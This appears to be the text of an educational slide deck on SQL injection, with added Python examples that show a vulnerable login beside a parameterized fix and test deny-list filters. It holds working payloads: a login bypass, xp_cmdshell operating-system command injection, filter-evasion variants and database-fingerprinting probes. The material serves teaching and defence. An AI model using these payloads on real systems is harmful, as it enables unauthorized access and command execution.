How Did I Steal Your Database

How Did I Steal Your Database
Mostafa Siraj
@mostafasiraj

Agenda
Noooo, it kills suspense

DISCLAIMER
Hacking websites is ILLEGAL
This presentation is meant for educational purposes ONLY
Only use this stuff on YOUR website and YOUR account

SQL Injection
What is it?
The application dynamically generates an SQL query based on user input, but it does not sufficiently prevent that input from modifying the intended structure of the query.

SQL Injection Example, Bypassing Logon
• Original SQL query:
String sqlQuery = "SELECT * FROM user WHERE name = '" + username + "' AND pass='" + password + "'";
...
• Setting username to Mostafa and password to ' OR '1'='1 produces:
SELECT * FROM user WHERE name = 'Mostafa' AND pass='' OR '1'='1'
• The attacker is logged on without authentication
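The logon bypass from this slide run against a real query, as an added Python example that is not the deck's own code: sqlite3 stands in for the MS SQL Server the deck targets, the user rows are constructed, and the parameterized `login_safe` is the fix the Solution slide recommends.

```python
import sqlite3

# Constructed sample rows standing in for the deck's "user" table. The
# password column is plaintext only to mirror the slide's query; real
# applications store a password hash.
SAMPLE_USERS = [("Mostafa", "s3cret"), ("alice", "hunter2")]


def setup_db() -> sqlite3.Connection:
    """In-memory sqlite3 database shaped like the slide's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_query(username: str, password: str) -> str:
    """The concatenation from the slide: user input is pasted into SQL text."""
    return ("SELECT * FROM user WHERE name = '" + username
            + "' AND pass='" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Runs the concatenated query; a quote in the input rewrites the WHERE clause."""
    return conn.execute(build_query(username, password)).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized query: the values are bound as data by the driver, so
    the SQL structure is fixed before any user input is seen."""
    sql = "SELECT * FROM user WHERE name = ? AND pass = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = setup_db()
    bypass = "' OR '1'='1"  # the slide's password value
    print(build_query("Mostafa", bypass))
    print("vulnerable login:", login_vulnerable(db, "Mostafa", bypass))  # True
    print("parameterized login:", login_safe(db, "Mostafa", bypass))    # False
```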

Not only your web app and DB are at risk
• Depending on the DB, an attacker can access the operating system
• MS SQL Server: execute an OS command with xp_cmdshell
• Setting username to '; exec master.dbo.xp_cmdshell "dir";-- produces:
SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --
Note: dir lists directory contents

Let's play Hide and Seek
Original: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --
Defender: Disallow double quotes
Attacker: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell dir; --
Defender: Filter out the string "xp_cmdshell"
Attacker: ';declare @a varchar(1000);set @a = 'master.dbo.xp_' + 'cmdshell dir';exec (@a);--
Defender: Filter out "xp", "cmd", "shell", ...
Attacker: ';declare @a varchar(1000);set @a = reverse('rid llehsdmc_px.obd.retsam');exec (@a);--

Finding SQL Injection Bugs
• Submit a single quotation mark and observe the result
• Submit two single quotation marks and observe the result
• Identify the database by its string concatenation syntax, e.g.
  Oracle: '||'FOO
  MS-SQL: '+'FOO
  MySQL: ' 'FOO [note the space between the two quotes]
• For multistage processes, complete all the stages before observing the results
• For search fields, try using the wildcard character %
• For numeric data, if the original value was 2, try submitting 1+1 or 3-1
• If successful, try using SQL-specific keywords, e.g. 67-ASCII('A')
• If single quotes are filtered, try 51-ASCII(1) [note ASCII(1)=49]
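The three deny-list rounds from the Hide and Seek slide run against that slide's own payloads, beside an accept-only-known-good check for the numeric probes above, as an added Python example that is not the deck's code; the input values are constructed from the slides and no database is involved, only string checks.

```python
import re

# Constructed inputs: the original payload from the slide and its three evasions.
ORIGINAL = '\'; exec master.dbo.xp_cmdshell "dir"; --'
PAYLOADS = {
    "no_double_quotes": "'; exec master.dbo.xp_cmdshell dir; --",
    "split_string": "';declare @a varchar(1000);"
                    "set @a = 'master.dbo.xp_' + 'cmdshell dir';exec (@a);--",
    "reversed": "';declare @a varchar(1000);"
                "set @a = reverse('rid llehsdmc_px.obd.retsam');exec (@a);--",
}

# The defender's successive deny-lists from the slide, in order.
BLACKLIST_ROUNDS = [
    ['"'],                         # round 1: disallow double quotes
    ['"', "xp_cmdshell"],          # round 2: also filter the procedure name
    ['"', "xp", "cmd", "shell"],   # round 3: filter fragments of it
]


def blacklist_allows(value: str, banned: list) -> bool:
    """Deny-list check: the input passes when none of the banned substrings appear."""
    lowered = value.lower()
    return not any(token in lowered for token in banned)


def first_blocking_round(value: str):
    """1-based index of the first deny-list round that stops the input,
    or None when every round lets it through (the reversed payload)."""
    for i, banned in enumerate(BLACKLIST_ROUNDS, start=1):
        if not blacklist_allows(value, banned):
            return i
    return None


def allowlist_numeric(value: str) -> bool:
    """Accept-only-known-good check for the numeric field on the slide: a plain
    integer and nothing else, so '1+1' or '51-ASCII(1)' never reach the query
    even though the database would evaluate them to the expected 2."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


if __name__ == "__main__":
    print("original: blocked in round", first_blocking_round(ORIGINAL))  # 1
    for name, payload in PAYLOADS.items():
        print(f"{name}: blocked in round {first_blocking_round(payload)}")
    for probe in ["2", "1+1", "3-1", "67-ASCII('A')", "51-ASCII(1)"]:
        print(probe, "->", "accept" if allowlist_numeric(probe) else "reject")
```

Each round stops only the payload it was written for and lets the next one through, which is why the Solution slide puts allowlisting and parameterized queries ahead of filtering.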

Inject into different statement types
• You can do the same for all SQL statements (INSERT, UPDATE or DELETE)
• Watch out when injecting into UPDATE or DELETE: a modified WHERE clause can change or delete every row in the table

Demo
WebGoat

Demo
HacmeBank

Demo
Using UNION Operator

Demo
MS-SQL Error

Solution
• Validate the input (accept only known good)
• Process SQL queries using prepared statements, parameterized queries, or stored procedures
• Enforce least privilege
• Avoid detailed error messages
• Show care when using stored procedures (e.g. exec)

Thank You
@mostafasiraj